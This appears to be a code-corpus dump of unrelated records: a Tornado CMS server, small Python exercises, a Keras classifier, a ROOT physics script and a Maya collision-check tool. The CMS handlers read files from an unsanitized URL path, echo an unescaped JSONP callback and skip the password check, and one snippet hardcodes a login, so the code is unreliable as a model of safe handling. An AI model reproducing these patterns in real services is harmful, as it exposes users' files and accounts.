gmtypes = manage.get_gmtypes(group)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
name = self.get_argument('name')
manage.create_gmtype(group, name)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id=''):
manager = self.get_argument('manager')
group = _check_groups_(manager)
manage.delete_gmtype(group, _id)
self.render_json_response(**OK)
class AccountHandler(BaseHandler):
'''
manager account login
'''
__ADMIN__ = 1000
@_trace_wrapper
@_parse_body
# @_check_token
def post(self):
'''
manager login
'''
user = self.get_argument('manager')
password = self.get_argument('password')
_user = manage.get_manager(user, password)
if not _user:
raise HTTPError(404, reason='can\'t found account')
# if password != _user['password']:
# raise HTTPError(403, reason='password error')
token = util.token(user)
_user.pop('possword', '')
if _user['groups'] == self.__ADMIN__:
# admin account, response page contains group manager
pass
else:
# only message manager contents
pass
self.render_json_response(User=_user['user'], token=token, **OK)
logger.info('Manager: {} login successfully'.format(user))
#
# self.render('cms_platform.html', token=token, **_user)
# **************************************************
#
# Message handler
#
# **************************************************
class SectionHandler(BaseHandler):
'''
manager message type
'''
@_trace_wrapper
def get(self, _id=''):
if _id:
record = manage.get_section(_id)
self.render_json_response(Code=200, Msg='OK', section=record)
else:
records = manage.get_sections()
self.render_json_response(Code=200, Msg='OK', sections=records)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
'''
add new message type
'''
name = self.get_argument('name')
manage.add_section(name)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id):
'''
delete special message type by id
'''
manage.delete_section(_id)
self.render_json_response(**OK)
class MessageHandler(BaseHandler):
'''
maintain message
message type:
news
notices (use subtitle)
push to app notices (use subtitle)
recruit
'''
def render_messages(self, **kwargs):
'''
Encode dict and return response to client
'''
# self.set_header('Access-Control-Allow-Origin', '*')
origin = self.request.headers.get('Origin', '')
if origin and origin in settings['sites']:
self.set_header('Access-Control-Allow-Origin', origin)
callback = self.get_argument('callback', None)
# check should return jsonp
if callback:
self.set_status(200, kwargs.get('Msg', None))
self.finish('{}({})'.format(callback, json_encoder(kwargs)))
else:
self.set_status(kwargs['Code'], kwargs.get('Msg', None))
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(kwargs))
def render_message_response(self, message):
'''
return html|json based on the Accept contents
'''
accept = self.request.headers.get('Accept', 'text/html')
if accept.startswith('application/json'):
self.render_json_response(Code=200, Msg='OK', **message)
else:
if self.is_mobile():
self.render('m_message.tmpt', **message)
else:
self.render('message.tmpt', **message)
@_trace_wrapper
@_parse_body
#@_check_token
def get(self, _id=''):
'''
get message
'''
# logger.info('id: {}, {}'.format(_id, self.request))
if _id:
message = manage.get_message(_id)
if not message:
raise HTTPError(404, reason='Can\'t found message')
return self.render_message_response(message)
# get messages
manager = self.get_argument('manager', '')
groups = 0
if manager:
# manager get it's messages
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
groups = _check_groups_(manager)
else:
# user get messages
groups = int(self.get_argument('groups'))
label = self.get_argument('label', '')
page = int(self.get_argument('page', 0))
nums = int(self.get_argument('per', 10))
mask = int(self.get_argument('mask', 0))
gmtype = int(self.get_argument('gmtype', 0))
isimg = int(self.get_argument('isimg', 0))
pos = page*nums
messages = manage.get_messages(groups, mask, isimg, gmtype, label, pos, nums)
# logger.info('messages: {}'.format(messages[0]['image']))
isEnd = 1 if len(messages) < nums else 0
# self.render_json_response(Code=200, Msg='OK', messages=messages, end=isEnd)
self.render_messages(Code=200, Msg='OK', messages=messages, end=isEnd)
@_trace_wrapper
@_parse_body
@_check_token
def post(self, _id=''):
'''
create new message record
title subtitle section mask author groups status ctime content image
labels : labes are separate by ' '
'''
logger.info('{}'.format(self.request.arguments))
manager = self.get_argument('manager')
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs['author'] = manager
kwargs.pop('token')
kwargs.pop('manager')
kwargs['groups'] = _check_groups_(manager)
manage.create_message(**kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def put(self, _id):
'''
update message record
'''
kwargs = {key:value[0] for key,value in self.request.arguments.iteritems()}
kwargs.pop('token')
kwargs.pop('manager')
manage.update_message(_id, **kwargs)
self.render_json_response(**OK)
@_trace_wrapper
@_parse_body
@_check_token
def delete(self, _id):
manage.delete_message(_id)
self.render_json_response(**OK)
class UeditorHandler(BaseHandler):
'''
support for ueditor upload images
'''
@_trace_wrapper
@_parse_body
def get(self):
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(ueditor_config.config))
@_trace_wrapper
@_parse_body
def post(self):
file_metas = self.request.files['upfile']
filename, ext = '', ''
for meta in file_metas:
filename = meta['filename']
if '.' in filename and filename[-1] != '.':
ext = filename.split('.')[-1]
content_type = meta['content_type']
now = _now()
mask = util.generate_password(8)
md5 = util.md5(filename, content_type, now, mask)
filename = md5.hexdigest()
if ext:
filename = '.'.join([filename, ext])
filepath = os.path.join(UEDITOR_IMAGE_PATH, filename)
# filepath = '.'.join([filepath, ext])
with open(filepath, 'wb') as uf:
uf.write(meta['body'])
# only support signle file upload
break
if filename:
url = UE_IMAGE_PREFIX + filename
# url = '.'.join([url, ext])
self.render_json_response(url=url, state='SUCCESS', **OK)
else:
raise HTTPError(400)
# @tornado.web.stream_request_body
class ImageHandler(BaseHandler):
'''
1. user upload image & update databse
'''
# def initialize(self):
# self.bytes_read = 0
# def data_received(self, data):
# self.bytes_read += len(data)
def _gen_image_id_(self, *args):
now = util.now()
return util.md5(now, *args).hexdigest()
@_trace_wrapper
def get(self, _id):
filepath = os.path.join(UPLOAD_IMAGE_PATH, _id)
logger.info('id:{}, filepath:{}'.format(_id, filepath))
with open(filepath, 'rb') as f:
data = f.read()
self.finish(data)
@_trace_wrapper
# @_parse_body
def post(self, _id=None):
'''
engineer uplaod image
update engineer's image
'''
file_metas = self.request.files['uploadImg']
filename, ext = _id, ''
for meta in file_metas:
filename = meta['filename']
content_type = meta['content_type']
if '.' in filename and filename[-1] != '.':
ext = filename.split('.')[-1]
if not _id:
filename = self._gen_image_id_(filename, content_type, util.generate_password(8))
if ext:
filename = '.'.join([filename, ext.lower()])
else:
filename = _id
filepath = os.path.join(UPLOAD_IMAGE_PATH, filename.lower())
with open(filepath, 'wb') as uf:
uf.write(meta['body'])
break
if filename:
self.render_json_response(name=UF_IMAGE_PREFIX+filename, **OK)
else:
raise HTTPError(400)
_DEFAULT_BACKLOG = 128
# These errnos indicate that a non-blocking operation must be retried
# at a later time. On most paltforms they're the same value, but on
# some they differ
_ERRNO_WOULDBLOCK = (errno.EWOULDBLOCK, errno.EAGAIN)
if hasattr(errno, 'WSAEWOULDBLOCK'):
_ERRNO_WOULDBLOCK += (errno.WSAEWOULDBLOCK, )
def bind_udp_socket(port, address=None, family=socket.AF_UNSPEC, backlog=_DEFAULT_BACKLOG, flags=None):
'''
'''
udp_sockets = []
if address == '':
address = None
if not socket.has_ipv6 and family == socket.AF_UNSPEC:
family = socket.AFINET
if flags is None:
flags = socket.AI_PASSIVE
bound_port = None
for res in socket.getaddrinfo(address, port, family, socket.SOCK_DGRAM, 0, flags):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if errno_from_exception(e) == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
if hasattr(socket, 'IPPROTO_IPV6'):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 & IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and bound_port is not None:
sockaddr = tuple([host, bound_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
bound_port = sock.getsockname()[1]
udp_sockets.append(sock)
return udp_sockets
def add_udp_handler(sock, servers, io_loop=None):
'''
Read data in 4096 buffer
'''
if io_loop is None:
io_loop = tornado.ioloop.IOLoop.current()
def udp_handler(fd, events):
while True:
try:
data, addr = sock.recvfrom(4096)
if data:
# ac data arrived, deal with
pass
except socket.error as e:
if errno_from_exception(e) in _ERRNO_WOULDBLOCK:
# _ERRNO_WOULDBLOCK indicate we have accepted every
# connection that is avaiable
return
import traceback
traceback.print_exc(file=sys.stdout)
except:
import traceback
traceback.print_exc(file=sys.stdout)
io_loop.add_handler(sock.fileno(), udp_handler, tornado.ioloop.IOLoop.READ)
def main():
global logger
tornado.options.parse_command_line()
import trace
trace.init(settings['LOG_CMS_PATH'], options.port)
logger = trace.logger('cms', False)
logger.setLevel(logging.INFO)
bidong_pid = os.path.join(settings['CMS_RUN_PATH'], 'p_{}.pid'.format(options.port))
with open(bidong_pid, 'w') as f:
f.write('{}'.format(os.getpid()))
app = Application()
app.listen(options.port, xheaders=app.settings.get('xheaders', False))
io_loop = tornado.ioloop.IOLoop.instance()
logger.info('CMS Server Listening:{} Started'.format(options.port))
io_loop.start()
if __name__ == '__main__':
main()
|
999,340 | 3da598903397a4fdf6456f6a8fe684f5de761dfc | # !/bin/env python2
# -*- coding: utf-8 -*-
def solve():
p, n = [1], 1
while True:
now, delta, cnt = 0, 1, 0
while delta <= n:
sign = -1 if cnt % 4 > 1 else 1
now = (now + sign * p[n - delta] + 1000000) % 1000000
cnt += 1
k = - (cnt / 2) - 1 if cnt % 2 else cnt / 2 + 1
delta = k * (3 * k - 1) / 2
p.append(now)
if now == 0:
return n
n += 1
return -1
if __name__ == "__main__":
print solve()
|
999,341 | b50eb19c43ad50d56347da86509ffb73cd63f1c5 | from django.apps import AppConfig
class Aik2Config(AppConfig):
name = 'aik2'
|
999,342 | 114f63378a14d5231ef1c699a24bb7e81127f0df | # Evaluating ANN
import pandas as pd
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.model_selection import train_test_split
# Importing the dataset
data_set = pd.read_csv('Churn_Modelling.csv')
X = data_set.iloc[:, 3:13].values
y = data_set.iloc[:, 13].values
# Encoding categorical data
label_encoder_X_1 = LabelEncoder()
X[:, 1] = label_encoder_X_1.fit_transform(X[:, 1])
label_encoder_X_2 = LabelEncoder()
X[:, 2] = label_encoder_X_2.fit_transform(X[:, 2])
one_hot_encoder = OneHotEncoder(categorical_features = [1])
X = one_hot_encoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting the dataset into the Training set and Test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
def build_classifier():
classifier = Sequential()
classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))
classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))
classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))
classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
return classifier
classifier = KerasClassifier(build_fn=build_classifier(), batch_size=10, epochs=100)
accuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10, n_jobs=1)
|
999,343 | 1f36e14df8423b069dc099fefb94ec9411f905d3 | """
目的:将弹幕json转化为excel
作者:徐昭
"""
import openpyxl
import json
# 新建表格
wb = openpyxl.Workbook()
sheet = wb.create_sheet()
# 美化表格
sheet.column_dimensions['A'].width = 10
sheet.column_dimensions['B'].width = 20
sheet.column_dimensions['C'].width = 20
sheet.column_dimensions['D'].width = 50
# 表头赋值
sheet['A1'] = '类别'
sheet['B1'] = '发布时间'
sheet['C1'] = '发布者'
sheet['D1'] = '弹幕内容'
json_path = 'E:\\Python\\danmu.json'
# 读取JSON文件
with open(json_path, 'r', encoding='utf8') as f:
danmu = json.load(f)
data = danmu["data"]
# 循环填充表头下方的表格
for j in range(0, len(data)):
for id in range(0, 4):
sheet[chr(ord('A') + id) + str(j + 2)] = data[j][id]
# 保存文件
wb.save('E:\\Python\\danmu.xlsx')
|
999,344 | 8137345d040299cd1a1bd1ef045d1efd2e67b315 | with open('food.txt','r') as f:
for line in f:
print(line.strip())#.strip()可除去左右空白及換行 |
999,345 | 6898968d697fafa90ae0e3fcc7af4885c3384696 | from ROOT import *
import os,sys
gROOT.SetBatch(True)
gROOT.LoadMacro("vecUtils.h+")
gSystem.Load("/home/users/haweber/oxbridgelibrary/lib/liboxbridgekinetics-1.0.so")
gInterpreter.AddIncludePath("/home/users/haweber/oxbridgelibrary/include/oxbridgekinetics-1.0");
gInterpreter.AddIncludePath("/home/users/haweber/oxbridgelibrary/include")
gROOT.ProcessLine(".L /home/users/haweber/oxbridgelibrary/include/Davismt2.cc+")
gROOT.ProcessLine(".L topness.cc+")
gROOT.ProcessLine(".L ScanChainTemp.C+")
ch = []
dataset = []
#input_dir = '/nfs-7/userdata/stop2015/babies_4May2015/'
input_dir = '/nfs-7/userdata/stopRun2/StopBabies_V07_02_08_met30_ge1lep_2jskim/'
output_dir = './results/'+sys.argv[1]
if not os.path.isdir('./results'):
os.mkdir('./results')
if os.path.isdir(output_dir):
print 'output directory '+output_dir +' already exists'
print 'enter a new name for outputs'
sys.exit()
os.mkdir(output_dir)
os.mkdir(output_dir+'/hists')
os.mkdir(output_dir+'/plots')
ch_ttbar = TChain("t")
ch_ttbar.Add(input_dir+'ttbar.root')
ch.append(ch_ttbar)
dataset.append('TTbar')
ch_singleT = TChain('t')
ch_singleT.Add(input_dir+'t_sch.root')
ch_singleT.Add(input_dir+'tbar_sch.root')
ch_singleT.Add(input_dir+'t_tch.root')
ch_singleT.Add(input_dir+'tbar_tch.root')
ch_singleT.Add(input_dir+'t_tW.root')
ch_singleT.Add(input_dir+'tbar_tW.root')
ch.append(ch_singleT)
dataset.append('SingleT')
ch_TTV = TChain('t')
ch_TTV.Add(input_dir+'ttwjets.root')
ch_TTV.Add(input_dir+'ttzjets.root')
ch.append(ch_TTV)
dataset.append('TTV')
ch_WJets = TChain('t')
ch_WJets.Add(input_dir+'wjets.root')
ch.append(ch_WJets)
dataset.append('WJets')
ch_VV = TChain('t')
ch_VV.Add(input_dir+'wzjets.root')
ch_VV.Add(input_dir+'zz.root')
ch.append(ch_VV)
dataset.append('VV')
#ch_DYJets = TChain('t')
#ch_DYJets.Add(input_dir+'dyjets.root')
#ch.append(ch_DYJets)
#dataset.append('DYJets')
ch_Stop_425_325 = TChain('t')
ch_Stop_425_325.Add(input_dir+'stop_425_325.root')
ch.append(ch_Stop_425_325)
dataset.append('Stop_425_325')
ch_Stop_500_325 = TChain('t')
ch_Stop_500_325.Add(input_dir+'stop_500_325.root')
ch.append(ch_Stop_500_325)
dataset.append('Stop_500_325')
ch_Stop_650_325 = TChain('t')
ch_Stop_650_325.Add(input_dir+'stop_650_325.root')
ch.append(ch_Stop_650_325)
dataset.append('Stop_650_325')
ch_Stop_850_100 = TChain('t')
ch_Stop_850_100.Add(input_dir+'stop_850_100.root')
ch.append(ch_Stop_850_100)
dataset.append('Stop_850_100')
test = False
if test: dataset_toloop = dataset[:1]
else: dataset_toloop = dataset
for i,sample in enumerate(dataset_toloop):
ScanChain(ch[i],True,-1,sample,output_dir)
print '################ finished loops, gonna make plots now####################'
gROOT.ProcessLine('.L dataMCplotMaker.cc+')
file = TFile(output_dir+'/hists/TTbar.root')
SetTDRStyle()
bgnames = ["TTbar","SingleT","TTV","WJets","VV"]
signames = ["Stop_425_325","Stop_500_325","Stop_650_325","Stop_850_100"]
#bgnames = ["TTbar","SingleT","TTV","VV"]
sigfiles = map(lambda x:TFile(output_dir+'/hists/'+x+'.root'),signames)
bgfiles = map(lambda x:TFile(output_dir+'/hists/'+x+'.root'),bgnames)
hists = []
#for k in file.GetListOfKeys():hists.append(k.GetName())
hists = ["PostAll_Topness_TTbar","PreMT_Topness_TTbar","Topness_TTbar"]
##loop over histograms to plot
for hist in hists:
bghist = []
sighist = []
options = "--outputName " + output_dir+'/plots/' + hist + " --xAxisLabel " + hist + " --noXaxisUnit --energy 13 --lumi 10 --legendTextSize 0.02 --preserveBackgroundOrder --legendUp 0.05 --legendRight -0.2"
for ibg,bg in enumerate(bgnames):
h1 = TH1F()
h1 = bgfiles[ibg].Get(hist.replace('TTbar',bg))
# if not hZee.InheritsFrom("TH1"):
bghist.append(h1)
for isig,sig in enumerate(signames):
h1 = TH1F()
h1 = sigfiles[isig].Get(hist.replace('TTbar',sig))
sighist.append(h1)
bghist_vector = std.vector('TH1F*')()
bghist_vector.clear()
sighist_vector = std.vector('TH1F*')()
sighist_vector.clear()
bgnames_vector = std.vector(string)()
bgnames_vector.clear()
signames_vector = std.vector(string)()
signames_vector.clear()
for item in bghist:bghist_vector.push_back(item)
for item in sighist:sighist_vector.push_back(item)
for item in bgnames:bgnames_vector.push_back(item)
for item in signames:signames_vector.push_back(item)
null = TH1F()
#dataMCplotMaker(null,bghist_vector,bgnames,"sig x10","",options,sighist_vector,signames)
dataMCplotMaker(null,bghist_vector,bgnames_vector,"sig x10","",options,sighist_vector,signames_vector)
# dataMCplotMaker(null,bghist,bgnames,"sig x10","",options,sighist,signames)
|
999,346 | 6a48b4d05ba13e6826b4f1adb583203d5b1587fc | # 여기에 숫자를 넣으면 어떻게 되는지 알려주는 함수
def ifpung(inp):
if inp == '1':
print("펑하고 터졌다")
def idpw_ck(userid, pwd):
if userid == 'aaa' and pwd == '1234':
return "로그인 되었습니다. {}님 반갑습니다".format(userid)
else:
return "로그인 실패. 아이디가 없거나 패스워드가 틀렸습니다" |
999,347 | f53074f9150dca86bc5a8ec2f19637d6e993bde9 | # -*- coding: utf-8 -*-
'''
Created on 2017
@author: yufengsheng
'''
from maya.cmds import *
import maya.mel as mel
import sys
if not pluginInfo('SOuP',q=1,l=1):
loadPlugin('SOuP', qt=True)
def yuCheckAnimatorWin():
windowName='checkAnimatorWin'
if(window(windowName,exists=1)):
deleteUI(windowName)
window(windowName,title=u'动画穿插检查工具',mxb=0,wh=(514,124))
columnLayout(adj=1)
formLayout('mainForm')
intSliderGrp('smoothLevelTex',field=1,label=u'Smooth等级:',minValue=0,maxValue=10,fieldMinValue=0,fieldMaxValue=10,value=3)
button('smoothCreateBut',label=u'创建smooth',h=30,c='createSmoothCmd()')
button('clearSmoothClusterBut',label=u'清除Smooth和Cluster',h=30,c='removeSmooth_ClusterCmd()')
floatSliderGrp('boundingObjectRadiusTex',field=1,label=u'BoudingObject半径:',step=0.001,minValue=0,maxValue=1,fieldMinValue=0,fieldMaxValue=1,value=0.025,cc='setBoundingObjRadiusCmd()')
button('boundingObjectRadiusBut',label=u'修改半径',h=30,w=150,c='setBoundingObjRadiusCmd()')
button('restoreSelectedCmdBut',label=u'清除所选的检查',w=255,h=30,c='restoreSelectedCmd()')
button('restoreAllCmdBut',label=u'清除所有检查',w=255,h=30,c='restoreAllCmd()')
formLayout('mainForm',e=1,af=[('smoothLevelTex','left',-70),('smoothLevelTex','top',3),('boundingObjectRadiusTex','left',-35)],
ac=[('smoothCreateBut','left',5,'smoothLevelTex'),('clearSmoothClusterBut','left',5,'smoothCreateBut'),
('boundingObjectRadiusTex','top',10,'smoothLevelTex'),
('boundingObjectRadiusBut','top',10,'smoothLevelTex'),
('boundingObjectRadiusBut','left',5,'boundingObjectRadiusTex'),
('restoreSelectedCmdBut','top',10,'boundingObjectRadiusTex'),
('restoreAllCmdBut','top',10,'boundingObjectRadiusTex'),
('restoreAllCmdBut','left',2,'restoreSelectedCmdBut')])
setParent('..')
button('checkCmdBut',label=u'创建检查',c='checkCmd()')
setParent('..')
showWindow(windowName)
def checkCmd():
TransformName=''
boudingObjName=''
attributeTransferName=''
objShapeNames=[]
objs=ls(sl=1)
checkNodeGrp='checkNode_grp'
if not objExists(checkNodeGrp):
createNode('transform',n=checkNodeGrp)
for i in range(0,len(objs)):
objShapeNames=listRelatives(objs[i],shapes=1,ni=1)
if i==0:
#判断物体有没有把worldMesh[0]输出给boudingObject
if not listConnections(objShapeNames[0]+'.worldMesh[0]',s=0,d=1) or listConnections(objShapeNames[0]+'.worldMesh[0]',s=0,d=1)[0].find('boudingObject')<0:
radiusVal=floatSliderGrp('boundingObjectRadiusTex',q=1,v=1)
TransformName=createNode('transform',n=objs[i]+'boudingObject')
boudingObjName=createNode('boundingObject',n=objs[i]+'boudingObjectShape',p=TransformName)
setAttr(boudingObjName+'.type',3)
setAttr(boudingObjName+'.pointRadius',radiusVal)
setAttr(boudingObjName+'.pointColor',0,1,0,type='double3')
boudingObjShapeName=listRelatives(objs[i],shapes=1,ni=1)
connectAttr(boudingObjShapeName[0]+'.worldMesh[0]',boudingObjName+'.inMesh')
parent(TransformName,checkNodeGrp)
else:
print '已经创建boundingObject'
boudingObjName=listConnections(objShapeNames[0]+'.worldMesh[0]',s=1)[0]
else:
#判断inMesh节点是否被连接
if listConnections(objShapeNames[0]+'.inMesh',s=1):
#判断inMesh节点是否被arrayToPointColor连接
if listConnections(objShapeNames[0]+'.inMesh',s=1)[0].find('_arrayToPointColor')==-1:
attributeTransferName=createNode('attributeTransfer',n=objs[i]+'attributeTransfer')
setAttr(attributeTransferName+'.color',1)
setAttr(attributeTransferName+'.solidAlpha',1)
#判断attributeTransfer节点的boundingObjects[0]是否被连接
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for attributeTransferAttr in attributeTransferAttrs:
#判断attributeTransfer节点的boundingObjects是否被连接
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+'].boundParentMatrix')
if getAttr(objShapeNames[0]+'.displayColors')==0:
setAttr(objShapeNames[0]+'.displayColors',1)
objOutputGeoAttr=listConnections(objShapeNames[0]+'.inMesh',s=1,p=1)
connectAttr(objOutputGeoAttr[0],attributeTransferName+'.inGeometry')
#connectAttr(attributeTransferName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
arrayDataContainerName=soup().create('arrayDataContainer')
arrayDataContainerName=rename(arrayDataContainerName,objs[i]+'arrayDataContainer')
arrayToPointColorName=createNode('arrayToPointColor',n=objs[i]+'arrayToPointColor')
connectAttr(attributeTransferName+'.outRgbaPP',arrayDataContainerName+'.inArray')
connectAttr(arrayDataContainerName+'.outArray',arrayToPointColorName+'.inRgbaPP')
connectAttr(attributeTransferName+'.outGeometry',arrayToPointColorName+'.inGeometry')
connectAttr(arrayToPointColorName+'.outGeometry',objShapeNames[0]+'.inMesh',force=1)
else:
connectToMeshNode=listConnections(objShapeNames[0]+'.inMesh',s=1)[0]
attributeTransferName=listConnections(connectToMeshNode,s=1)[2]
#判断attributeTransfer节点的boundingObjects[0]是否被连接
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for i in range(0,len(attributeTransferAttrs)):
#判断attributeTransfer节点的哪个boundingObjects属性被连接
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+'].boundParentMatrix')
elif i>=len(attributeTransferAttrs)-1:
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+'].boundParentMatrix')
else:
if not ls(objs[i]+'cluster'):
clusterName=cluster(objs[i],relative=0,n=objs[i]+'cluster',)
attributeTransferName=createNode('attributeTransfer',n=objs[i]+'attributeTransfer')
setAttr(attributeTransferName+'.color',1)
setAttr(attributeTransferName+'.solidAlpha',1)
clusterGeo=cluster(clusterName[0],q=1,g=1)
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for attributeTransferAttr in attributeTransferAttrs:
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttr)+'].boundParentMatrix')
if getAttr(clusterGeo[0]+'.displayColors')==0:
setAttr(clusterGeo[0]+'.displayColors',1)
connectAttr(clusterName[0]+'.outputGeometry[0]',attributeTransferName+'.inGeometry')
#connectAttr(attributeTransferName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
#parent(clusterName[1],checkNodeGrp)
arrayDataContainerName=soup().create('arrayDataContainer')
arrayDataContainerName=rename(arrayDataContainerName,objs[i]+'arrayDataContainer')
arrayToPointColorName=createNode('arrayToPointColor',n=objs[i]+'arrayToPointColor')
connectAttr(attributeTransferName+'.outRgbaPP',arrayDataContainerName+'.inArray')
connectAttr(arrayDataContainerName+'.outArray',arrayToPointColorName+'.inRgbaPP')
connectAttr(attributeTransferName+'.outGeometry',arrayToPointColorName+'.inGeometry')
connectAttr(arrayToPointColorName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
else:
connectToMeshNode=listConnections(objShapeNames[0]+'.inMesh',s=1)[0]
attributeTransferName=listConnections(connectToMeshNode,s=1)[2]
#判断attributeTransfer节点的boundingObjects[0]是否被连接
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for i in range(0,len(attributeTransferAttrs)):
#判断attributeTransfer节点的哪个boundingObjects属性被连接
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+'].boundParentMatrix')
elif i>=len(attributeTransferAttrs)-1:
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+'].boundParentMatrix')
def createSmoothCmd():
smoothLevelValue=intSliderGrp('smoothLevelTex',q=1,value=1)
objName=ls(sl=1,l=1)[0].split('|')[len(ls(sl=1,l=1)[0].split('|'))-1]
temp_smoothName=polySmooth(c=0,dv=smoothLevelValue)
smoothName=rename(temp_smoothName,objName+'Smooth')
def restoreAllCmd():
grpName=ls('checkNode_grp',tr=1)[0]
if grpName:
delete(grpName)
#boundingObjectNodes=ls('*:*boudingObject',tr=1)
#if boundingObjectNodes:
# delete(boundingObjectNodes)
arrayToPointColorNodes=ls(type='arrayToPointColor')
for arrayToPointColorNode in arrayToPointColorNodes:
connectMesh=listConnections(arrayToPointColorNode,s=0,d=1,p=1)[0]
attributeTransferNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[1].split('.')[0]
arrayDataContainerNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[0].split('.')[0]
timeToUnitNode=listConnections(arrayDataContainerNode,s=1,d=0,p=1)[0].split('.')[0]
delete(timeToUnitNode)
outGeoNode=listConnections(attributeTransferNode+'.inGeometry',s=1,d=0,p=1)[0]
connectAttr(outGeoNode,connectMesh,force=1)
setAttr(connectMesh.split('.')[0]+'.displayColors',0)
if arrayToPointColorNodes:
delete(arrayToPointColorNodes)
arrayDataContainerNodes=ls(type='arrayDataContainer')
if arrayDataContainerNodes:
delete(arrayDataContainerNodes)
attributeTransferNodes=ls(type='attributeTransfer')
if attributeTransferNodes:
delete(attributeTransferNodes)
smoothNames=ls('*:*Smooth*',typ='polySmoothFace')
if len(smoothNames)>0:
for smoothName in smoothNames:
setAttr(smoothName+'.divisions',0)
#delete(smoothNames)
def restoreSelectedCmd():
#boundingObjectNodes=ls('*:*boudingObject',tr=1)
#if boundingObjectNodes:
# delete(boundingObjectNodes)
selObjNames=ls(sl=1)
okAttrs=[]
boundingObjNodes=[]
for selObj in selObjNames:
arrayToPointColorNode=ls(selObj+'arrayToPointColor',type='arrayToPointColor')[0]
connectMesh=listConnections(arrayToPointColorNode,s=0,d=1,p=1)[0]
